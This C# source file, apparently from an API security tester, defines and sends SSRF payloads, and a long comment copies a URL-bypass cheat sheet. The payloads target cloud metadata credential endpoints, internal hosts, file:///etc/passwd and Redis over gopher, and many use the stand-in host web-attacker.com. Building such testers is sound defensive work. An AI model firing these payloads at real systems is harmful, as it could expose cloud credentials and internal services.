namespace API_Tester;

public partial class MainPage
{
    /*
    Advanced SSRF encoding payloads.

    Purpose:
    These payloads attempt to bypass URL validation mechanisms and force the
    application to access internal services such as localhost or cloud metadata.

    Threat being tested:
    Server-Side Request Forgery (SSRF)

    Attack techniques included:
    - Integer encoded localhost
    - IPv6 loopback addresses
    - DNS rebinding tricks
    - Alternate IP representations
    - Internal network probing

    Expected behavior:
    The server should reject these URLs or restrict requests to allowed hosts.
    */
    
    private static string[] GetAdvancedSsrfEncodingPayloads()
    {
        var payloads = new List<string>
        {
            // AWS metadata
            "http://169.254.169.254/latest/meta-data/",
            "http://169.254.169.254/latest/meta-data/iam/security-credentials/",

            // GCP metadata
            "http://metadata.google.internal/",
            "http://metadata/computeMetadata/v1/",

            // Azure metadata
            "http://169.254.169.254/metadata/instance?api-version=2021-02-01",

            // Alibaba metadata
            "http://100.100.100.200/latest/meta-data/",

            // ECS
            "http://169.254.170.2/v2/credentials/",

            // Kubernetes
            "http://kubernetes.default.svc/",

            // Internal IPs
            "http://127.0.0.1/",
            "http://localhost/",
            "http://10.0.0.1/",
            "http://172.16.0.1/",
            "http://192.168.0.1/",

            // IP encoding
            "http://2130706433/",
            "http://0177.0.0.1/",
            "http://0x7f000001/",
            "http://127.1/",

            // IPv6
            "http://[::1]/",
            "http://[::ffff:127.0.0.1]/",

            // DNS tricks
            "http://127.0.0.1.nip.io/",
            "http://127.0.0.1.xip.io/",

            // Credential bypass
            "http://127.0.0.1@example.com/",
            "http://example.com@127.0.0.1/",

            // LDAP/LDAPS
            "ldap://127.0.0.1:389/",
            "ldap://localhost:389/",

            // Protocol attacks
            "file:///etc/passwd",
            "gopher://127.0.0.1:6379/_INFO",
            "dict://127.0.0.1:11211/",
            "ftp://127.0.0.1/",
        };

        return ExpandHttpToHttps(payloads);
    }
    
    private static HttpRequestMessage FormatAdvancedSsrfEncodingRequest(Uri uri) => new(HttpMethod.Get, uri);

    private async Task<string> RunAdvancedSsrfEncodingTestsAsync(Uri baseUri)
    {
        var payloads = GetManualPayloadsOrDefault(GetAdvancedSsrfEncodingPayloads(), ManualPayloadCategory.Ssrf);
        payloads = ExpandHttpToHttps(payloads);
        return await RunPayloadProbeAsync(
            baseUri,
            "Advanced SSRF Encodings",
            payloads,
            new PayloadProbeOptions
            {
                QueryPayloadParameters = ["url"],
                RequestFactory = FormatAdvancedSsrfEncodingRequest
            });
    }
}

/* 
Expanded Payloads (https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet): 

// Absolute URL
"http://%09web-attacker.com/",
"http://%0Aweb-attacker.com/",
"http://%0D%0A//web-attacker.com",
"http://%0D%0A\\\\web-attacker.com",
"http://%5B::%5D/",
"http://%5B::1%5D/",
"http://%5B::1%5D%40%5B::1%5D%40web-attacker.com/",
"http://%5B::ffff:0.0.0.0%5D/",
"http://%5B::ffff:0000:0000%5D/",
"http://%5B::ffff:127.0.0.1%5D/",
"http://%5B::ffff:7f00:1%5D/",
"http://%5B::%EF%AC%80%EF%AC%80:7f00:1%5D/",
"http://%5B0:0:0:0:0:ffff:127.0.0.1%5D/",
"http://%5B0000::1%5D/",
"http://%5B0000:0000:0000:0000:0000:0000:0000:0000%5D/",
"http://%5B0000:0000:0000:0000:0000:0000:0000:0001%5D/",
"http://%400/",
"http://%40web-attacker.com",
"http://%40web-attacker.com",
"http://%40web-attacker.com",
"http:////web-attacker.com",
"http:////web-attacker.com",
"http:///\\web-attacker.com",
"http:///&bsol;/web-attacker.com",
"http:///&NewLine;/web-attacker.com",
"http:///&sol;/web-attacker.com",
"http:///&Tab;/web-attacker.com",
"http://\\%09\\web-attacker.com",
"http://\\%0A\\web-attacker.com",
"http://\\/\\/web-attacker.com",
"http://\\/web-attacker.com",
"http://\\\\web-attacker.com/",
"http://\\\\web-attacker.com\\",
"http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/",
"http://#web-attacker.com",
"http://0/",
"http://0:80",
"http://0.0.0.0/",
"http://0000.0000.0000.0000/",
"http://00000177.00000000.00000000.00000001/",
"http://0177.0000.0000.0001/",
"http://017700000001/",
"http://0x00000000/",
"http://0x100000000/",
"http://0x17f000001/",
"http://0x17f000002/",
"http://0x7F.0.0000.00000001/",
"http://0x7F.0.0000.0001/",
"http://0x7f.0x00.0x00.0x01/",
"http://0x7f.0x00.0x00.0x02/",
"http://0x7F.1/",
"http://0x7f000001/",
"http://0x7f000002/",
"http://127.0.0.1/",
"http://127.0.0.1%40127.0.0.1%40web-attacker.com/",
"http://127.0.0.2/",
"http://127.0.1/",
"http://127.000000000000000.1/",
"http://127.1/",
"http://2130706433/",
"http://45080379393/",
"http://anythingexample.com/",
"http://anythingexample.com/",
"http://example.com &%40web-attacker.com# %40web-attacker.com/",
"http://example.com;.web-attacker.com/",
"http://example.com:%40web-attacker.com/",
"http://example.com:443:\\%40%40web-attacker.com/",
"http://example.com:443\\%40web-attacker.com/",
"http://example.com:443#\\%40web-attacker.com/",
"http://example.com:anything%40web-attacker.com/",
"http://example.com?%40web-attacker.com/",
"http://example.com.web-attacker.com/",
"http://example.com%40web-attacker.com/",
"http://example.com#web-attacker.com/",
"http://example.comweb-attacker.com/",
"http://foo%40web-attacker.com %40example.com/",
"http://foo%40web-attacker.com:443%40example.com/",
"http://localhost/",
"http://localho%EF%AC%86/",
"http://localho%EF%AC%85/",
"http://localhost.web-attacker.com/",
"http://localhost.web-attacker.com/",
"http://localhost%40localhost%40web-attacker.com/",
"http://web-attacker.com",
"http://web-attacker.com",
"http://%01http://web-attacker.com",
"http://%02http://web-attacker.com",
"http://%03http://web-attacker.com",
"http://%04http://web-attacker.com",
"http://%05http://web-attacker.com",
"http://%06http://web-attacker.com",
"http://%07http://web-attacker.com",
"http://%08http://web-attacker.com",
"http://%09http://web-attacker.com",
"http://%0Ahttp://web-attacker.com",
"http://%0Bhttp://web-attacker.com",
"http://%0Chttp://web-attacker.com",
"http://%0Dhttp://web-attacker.com",
"http://%0Ehttp://web-attacker.com",
"http://%0Fhttp://web-attacker.com",
"http://%10http://web-attacker.com",
"http://%11http://web-attacker.com",
"http://%12http://web-attacker.com",
"http://%13http://web-attacker.com",
"http://%14http://web-attacker.com",
"http://%15http://web-attacker.com",
"http://%16http://web-attacker.com",
"http://%17http://web-attacker.com",
"http://%18http://web-attacker.com",
"http://%19http://web-attacker.com",
"http://%1Ahttp://web-attacker.com",
"http://%1Bhttp://web-attacker.com",
"http://%1Chttp://web-attacker.com",
"http://%1Dhttp://web-attacker.com",
"http://%1Ehttp://web-attacker.com",
"http://%1Fhttp://web-attacker.com",
"http:// http://web-attacker.com",
"http://h%09ttp://web-attacker.com",
"http://h%0Attp://web-attacker.com",
"http://h%0Dttp://web-attacker.com",
"http://http%09://web-attacker.com",
"http://http%0A://web-attacker.com",
"http://http%0D://web-attacker.com",
"http://%09http%09://web-attacker.com",
"http://%0Ahttp%0A://web-attacker.com",
"http://%0Dhttp%0D://web-attacker.com",
"http://http:/\\web-attacker.com",
"http://http:/\\\\web-attacker.com",
"http://http:\\\\web-attacker.com",
"http://http:\\web-attacker.com",
"http://http:/web-attacker.com",
"http://http:/0/web-attacker.com",
"http://web-attacker.com%09example.com/",
"http://web-attacker.com%0Aexample.com/",
"http://web-attacker.com%0D%0Aexample.com/",
"http://web-attacker.com%0Dexample.com/",
"http://web-attacker.com example.com/",
"http://web-attacker.com;https://example.com/",
"http://web-attacker.com?=.example.com/",
"http://web-attacker.com?=example.com/",
"http://web-attacker.com?example.com/",
"http://web-attacker.com?http://example.com/",
"http://web-attacker.com?https://example.com/",
"http://web-attacker.com../",
"http://web-attacker.com.example.com/",
"http://web-attacker.com.example.com/",
"http://web-attacker.com%40example.com/",
"http://web-attacker.com/?d=example.com/",
"http://web-attacker.com/.example.com/",
"http://web-attacker.com///example.com/",
"http://web-attacker.com/example.com/",
"http://web-attacker.com#example.com/",
"http://%00http://web-attacker.com",
"http://web-attacker.com?%00example.com/",
"http://web-attacker.com#%00example.com/",
"http://web-attacker.com%00example.com/"

// Headers
"http://[::]",
"http://[::1]",
"http://[::1]@[::1]@web-attacker.com",
"http://[::ffff:0.0.0.0]",
"http://[::ffff:0000:0000]",
"http://[::ffff:127.0.0.1]",
"http://[::ffff:7f00:1]",
"http://[::ﬀﬀ:7f00:1]",
"http://[0:0:0:0:0:ffff:127.0.0.1]",
"http://[0:0:0:0:0:ffff:1㉗.0.0.1]",
"http://[0:0:0:0:0:ffff:⑫7.0.0.1]",
"http://[0:0:0:0:0:ﬀﬀ:127.0.0.1]",
"http://[0000::1]",
"http://[0000:0000:0000:0000:0000:0000:0000:0000]",
"http://[0000:0000:0000:0000:0000:0000:0000:0001]",
"http://@0",
"http://\\l\\o\\c\\a\\l\\h\\o\\s\\t",
"http://0",
"http://0:80",
"http://0.0.0.0",
"http://0000.0000.0000.0000",
"http://00000177.00000000.00000000.00000001",
"http://0177.0000.0000.0001",
"http://017700000001",
"http://0⑰700000001",
"http://0x00000000",
"http://0x100000000",
"http://0x17f000001",
"http://0x17f000002",
"http://0x7F.0.0000.00000001",
"http://0x7F.0.0000.0001",
"http://0x7f.0x00.0x00.0x01",
"http://0x7f.0x00.0x00.0x02",
"http://0x7F.1",
"http://0x7f000001",
"http://0x7f000002",
"http://127.0.0.1",
"http://1㉗.0.0.1",
"http://⑫7.0.0.1",
"http://127.0.0.1@127.0.0.1@web-attacker.com",
"http://127.0.0.2",
"http://1㉗.0.0.2",
"http://⑫7.0.0.2",
"http://127.0.1",
"http://127.000000000000000.1",
"http://127.1",
"http://2130706433",
"http://21307064㉝",
"http://2130706㊸3",
"http://21㉚706433",
"http://2⑬0706433",
"http://㉑30706433",
"http://㉑㉚⑦⓪⑥④㉝",
"http://45080379393",
"http://anythingexample.com",
"http://example.com &@web-attacker.com# @web-attacker.com",
"http://example.com;.web-attacker.com",
"http://example.com:@web-attacker.com",
"http://example.com:443:\\@@web-attacker.com",
"http://example.com:443\\@web-attacker.com",
"http://example.com:443#\\@web-attacker.com",
"http://example.com:anything@web-attacker.com",
"http://example.com?@web-attacker.com",
"http://example.com._.web-attacker.com",
"http://example.com.-.web-attacker.com",
"http://example.com.,.web-attacker.com",
"http://example.com.;.web-attacker.com",
"http://example.com.!.web-attacker.com",
"http://example.com.'.web-attacker.com",
"http://example.com.\".web-attacker.com",
"http://example.com.(.web-attacker.com",
"http://example.com.).web-attacker.com",
"http://example.com.{.web-attacker.com",
"http://example.com.}.web-attacker.com",
"http://example.com.*.web-attacker.com",
"http://example.com.&.web-attacker.com",
"http://example.com.`.web-attacker.com",
"http://example.com.+.web-attacker.com",
"http://example.com.=.web-attacker.com",
"http://example.com.~.web-attacker.com",
"http://example.com.$.web-attacker.com",
"http://example.com.local",
"http://example.com.localhost",
"http://example.com.web-attacker.com",
"http://example.com[@web-attacker.com",
"http://example.com@web-attacker.com",
"http://example.com\\;@web-attacker.com",
"http://example.com&anything@web-attacker.com",
"http://example.com#web-attacker.com",
"http://example.com%23web-attacker.com",
"http://example.comweb-attacker.com",
"http://foo@web-attacker.com @example.com",
"http://foo@web-attacker.com:443@example.com",
"http://localhost",
"http://localhoﬆ",
"http://lo㎈host",
"http://localhoﬅ",
"http://localhost.web-attacker.com",
"http://localhost@localhost@web-attacker.com",
"http://sexample.com",
"http://web-attacker.com\texample.com",
"http://web-attacker.com",
"http://example.com",
"http://web-attacker.com\rexample.com",
"http://web-attacker.com\u2028example.com",
"http://web-attacker.com\u2029example.com",
"http://web-attacker.com @example.com",
"http://web-attacker.com &@example.com",
"http://web-attacker.com example.com",
"http://web-attacker.com;https://example.com",
"http://web-attacker.com:\\@@example.com",
"http://0://web-attacker.com:80;http://example.com:80/",
"http://web-attacker.com?=.example.com",
"http://web-attacker.com?=example.com",
"http://web-attacker.com?example.com",
"http://web-attacker.com?http://example.com",
"http://web-attacker.com?https://example.com",
"http://web-attacker.com..",
"http://web-attacker.com.example.com",
"http://web-attacker.com@@example.com",
"http://web-attacker.com@example.com",
"http://web-attacker.com/?d=example.com",
"http://web-attacker.com/.example.com",
"http://web-attacker.com///example.com",
"http://web-attacker.com/example.com",
"http://web-attacker.com\\.example.com",
"http://web-attacker.com\\@@example.com",
"http://web-attacker.com\\anything@example.com",
"http://web-attacker.com\\example.com",
"http://web-attacker.com&@example.com",
"http://web-attacker.com#@example.com",
"http://web-attacker.com#\\@example.com",
"http://web-attacker.com#example.com",
"http://web-attacker.com%0d%0a@example.com",
"http://web-attacker.com%23@example.com",
"http://web-attacker.com%2e@example.com",
"http://web-attacker.com%2f@example.com",
"http://web-attacker.com%3a443.example.com",
"http://web-attacker.com%ffexample.com",
"http://web-attacker.com+@example.com",
"http://web-attacker.com+&@example.com",
"http://web-attacker.com?"

// CORS
"http://anythingexample.com",
"http://anythingexample.com",
"http://example.com._.web-attacker.com",
"http://example.com.-.web-attacker.com",
"http://example.com.,.web-attacker.com",
"http://example.com.;.web-attacker.com",
"http://example.com.!.web-attacker.com",
"http://example.com.'.web-attacker.com",
"http://example.com.\".web-attacker.com",
"http://example.com.(.web-attacker.com",
"http://example.com.).web-attacker.com",
"http://example.com.{.web-attacker.com",
"http://example.com.}.web-attacker.com",
"http://example.com.*.web-attacker.com",
"http://example.com.&.web-attacker.com",
"http://example.com.`.web-attacker.com",
"http://example.com.+.web-attacker.com",
"http://example.com.=.web-attacker.com",
"http://example.com.~.web-attacker.com",
"http://example.com.$.web-attacker.com",
"http://example.com.web-attacker.com",
"http://example.comweb-attacker.com",
"http://localhost.web-attacker.com/",
"http://localhost.web-attacker.com/",
"http://null",
"http://sexample.com/",
"http://web-attacker.com.example.com",
"http://web-attacker.com.example.com",
*/